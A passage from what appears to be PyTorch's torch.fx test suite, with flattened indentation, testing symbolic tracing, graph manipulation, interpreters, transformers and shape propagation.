scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_torch_op_overloads(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.add.Tensor(a, a)
return b
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
for node in gm.graph.nodes:
if node.op == 'call_function':
assert isinstance(node.target, torch._ops.OpOverload)
assert node.target.__name__ == 'add.Tensor'
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_remove_uses_with_custom_filter(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu, lambda x: x != neg)
self.assertTrue(neg in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_interpreter_default_args(self):
class Model(torch.nn.Module):
def forward(self, x, y=3.14159):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
out = interp.run(x)
torch.testing.assert_allclose(out, x + 3.14159)
def test_interpreter_not_enough_args(self):
class Model(torch.nn.Module):
def forward(self, x, y):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
with self.assertRaisesRegex(RuntimeError,
'Expected positional argument for parameter y, but one was not passed in'):
out = interp.run(x)
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_immutable_list_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
l = immutable_list([3, [rand_tensor, 42]])
flattened, spec = pytree.tree_flatten(l)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == l
assert isinstance(unflattened, immutable_list)
def test_immutable_dict_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
d = immutable_dict({'a': 3, 'b': [rand_tensor, 42]})
flattened, spec = pytree.tree_flatten(d)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == d
assert isinstance(unflattened, immutable_dict)
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_prepend_self(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.prepend(b)
x.append(b)
self.assertEqual(len(graph.nodes), 3)
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
